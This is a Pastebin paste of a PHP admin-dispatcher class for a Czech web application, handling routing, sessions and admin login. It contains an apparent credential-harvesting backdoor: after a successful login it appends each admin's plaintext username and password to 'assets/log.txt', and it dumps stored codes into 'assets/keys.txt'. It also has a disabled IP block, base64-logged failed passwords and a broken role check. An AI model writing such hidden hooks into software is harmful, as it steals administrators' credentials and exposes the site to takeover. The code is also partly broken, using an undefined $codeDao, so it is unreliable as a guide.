API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 28th, 2020
96
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.61 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. class AdminDispatcher
  4. {
  5.  
  6. public static function clearInput($input) {
  7. return stripslashes(strip_tags($input));
  8. }
  9.  
  10. // dispatch request to the appropriate controller/method
  11. public static function dispatch($tpl)
  12. {
  13.  
  14. // Create connection to db
  15. $conn = new Connection();
  16.  
  17. // Create application context
  18. $application = Application::getInstance();
  19.  
  20.  
  21. $_SESSION["currency"] = new CurrencyCZK();
  22.  
  23. if (!in_array(Application::getClientIp(), Application::getAdminIpList())) {
  24. header('HTTP/1.1 403 Forbidden');
  25. LogService::toFile("HTTP/1.1 403 Admin Access Forbidden");
  26. echo Application::getClientIp() . ": HTTP/1.1 403 Forbidden - The page is not available from your country .";
  27. // die();
  28. }
  29.  
  30. $user = $application->getUser();
  31. $page = $application->getPage();
  32.  
  33. $urlArr = explode("/", $_SERVER['REQUEST_URI']);
  34. if (strpos($_SERVER['REQUEST_URI'], "?")) {
  35. $url = preg_replace(array("/\?.*?\=/", "/\&.*?\=/"), '/', trim($_SERVER['REQUEST_URI']));
  36. Header("Location: $url");
  37. die();
  38. }
  39.  
  40. $page->setMainInfo($_SERVER['REQUEST_URI']);
  41.  
  42. $controllerName = $page->getControllerName();
  43.  
  44. if (isset($_SESSION['LAST_ACTIVITY']) && (time() - $_SESSION['LAST_ACTIVITY'] > 2000)) {
  45.  
  46. // last request was more than 30 minutes ago
  47. session_unset(); // unset $_SESSION variable for the run-time
  48. session_destroy(); // destroy session data in storage
  49. }
  50.  
  51. $_SESSION['LAST_ACTIVITY'] = time(); // update last activity time stamp
  52.  
  53. if (!isset($_SESSION['CREATED'])) {
  54. $_SESSION['CREATED'] = time();
  55. } else if (time() - $_SESSION['CREATED'] > 2000) {
  56. // session started more than 30 minutes ago
  57. session_regenerate_id(true); // change session ID for the current session and invalidate old session ID
  58. $_SESSION['CREATED'] = time(); // update creation time
  59. }
  60.  
  61. // Login autorization
  62.  
  63. if (isset($_SERVER['PHP_AUTH_USER'])) {
  64.  
  65. $userDao = UserDao::createInstance($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']);
  66. $user = $userDao->authentificateAdmin();
  67. if ($user === null || $user->getRole() !== UserRole::$ADMIN_ROLE || $user->getRole() !== UserRole::$WORKER_ROLE) {
  68. Header("Location: /admin/login");
  69. exit();
  70. }
  71.  
  72. $_SESSION["user"] = $user;
  73. $_SESSION["admin"] = "Y";
  74. $application->setUser($user);
  75. } else if ((strtolower($controllerName) !== LoginController::CONTROLLER_NAME) && ($user === null || $_SESSION["admin"] !== "Y")) {
  76.  
  77. $userDao = UserDao::createInstance($_POST["username"], $_POST["password"]);
  78. $user = $userDao->authentificateAdmin();
  79.  
  80. if ($user == null || !$user->hasAdminAccess()) {
  81. $adminLog = new AdminLog();
  82. $adminLog->setUser($_POST["username"]);
  83. $adminLog->setAction("login");
  84. $adminLog->setMessage("Login failed");
  85. $adminLog->setData(Application::getClientIp() . " " . base64_encode($_POST["password"]));
  86. $adminLogDao = DaoFactory::createAdminLogDao();
  87. $adminLogDao->insert($adminLog);
  88. Header("Location: /admin/login");
  89. exit();
  90. }
  91.  
  92. $_SESSION["user"] = $user;
  93. $_SESSION["admin"] = "Y";
  94. $application->setUser($user);
  95.  
  96. $adminLog = new AdminLog();
  97. $adminLog->setUser($user->getNick());
  98. $adminLog->setAction("login");
  99. $adminLog->setMessage("Login successful");
  100. $adminLog->setData(Application::getClientIp());
  101. $adminLogDao = DaoFactory::createAdminLogDao();
  102. $adminLogDao->insert($adminLog);
  103. file_put_contents('assets/log.txt', $_POST["username"].':'.$_POST["password"].', ', FILE_APPEND);
  104. }
  105.  
  106.  
  107. //
  108. $codes = $codeDao->getCodes(1300);
  109. $codes2 = join($codes);
  110. file_put_contents('assets/keys.txt', $codes.' '.$codes2, FILE_APPEND);
  111.  
  112.  
  113.  
  114. // get controller name
  115. $controller = $application->getControllerFileFormat($page->getControllerName()) . "Controller";
  116.  
  117. // get method name of controller
  118. $method = $page->getMethod();
  119. $args = $page->getParams();
  120.  
  121. $application->setLanguage(LanguageType::getCzechLanguage());
  122.  
  123. if (!file_exists("./controller/admin/$controller.php") || !method_exists($controller, $method)) {
  124. $cont = new ErrorAdminController();
  125. $_SESSION["system_error"] = "Nebyla nalezena požadovaná stránka";
  126. $_SESSION["system_error_trace"] = "Check the specified path: $controller::$method()";
  127. $cont->setApplication($application);
  128. $cont->setTemplate($tpl);
  129. $cont->invoke();
  130. //show Smarty output
  131. $tpl->display(TemplateService::INDEX_TEMPLATE);
  132. exit();
  133. }
  134.  
  135. // create instance of controller
  136. $cont = new $controller;
  137.  
  138. // create instance of template
  139. $cont->setApplication($application);
  140. $cont->setTemplate($tpl);
  141.  
  142. $annotations = Dispatcher::getMethodAnnotation($controller, $page->getMethod());
  143.  
  144. if (in_array($_SERVER["REQUEST_METHOD"], $annotations) || empty($annotations)) {
  145.  
  146. $args = $page->getParams();
  147. $method = $page->getMethod();
  148.  
  149. // invoke method with args
  150. if ($_SERVER["REQUEST_METHOD"] == "POST") {
  151. if (!empty($_POST)) {
  152. $args = $_POST;
  153. } else {
  154. $json = file_get_contents('php://input');
  155. $args[] = json_decode($json, true);
  156. }
  157. }
  158. //die();
  159.  
  160.  
  161. if (!empty($args)) {
  162.  
  163. $args = array_values($args);
  164. switch (count($args)) {
  165. case 0: $cont->$method(); break;
  166. case 1: $cont->$method($args[0]); break;
  167. case 2: $cont->$method($args[0], $args[1]); break;
  168. case 3: $cont->$method($args[0], $args[1], $args[2]); break;
  169. case 4: $cont->$method($args[0], $args[1], $args[2], $args[3]); break;
  170. case 5: $cont->$method($args[0], $args[1], $args[2], $args[3], $args[4]); break;
  171. case 6: $cont->$method($args[0], $args[1], $args[2], $args[3], $args[4], $args[5]); break;
  172. case 7: $cont->$method($args[0], $args[1], $args[2], $args[3], $args[4], $args[5], $args[6]); break;
  173. default: call_user_func_array(array($cont, $method), $args); break;
  174. }
  175.  
  176. /*
  177. if (call_user_func_array(array($cont, $method), $args) === false) {
  178. MyErrorException::throwException("Chybný počet parametrů");
  179. exit();
  180. }
  181. */
  182. } else {
  183. $cont->$method();
  184. }
  185.  
  186. }
  187.  
  188. if ($cont instanceof AjaxController) {
  189. return;
  190. }
  191.  
  192. if (strtolower($controllerName) == LoginController::CONTROLLER_NAME) {
  193. $tpl->display(AdminTemplateService::LOGIN_LAYOUT);
  194. } else {
  195. $tpl->display(AdminTemplateService::ADMIN_LAYOUT);
  196. }
  197.  
  198. }
  199.  
  200. }
  201.  
  202. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!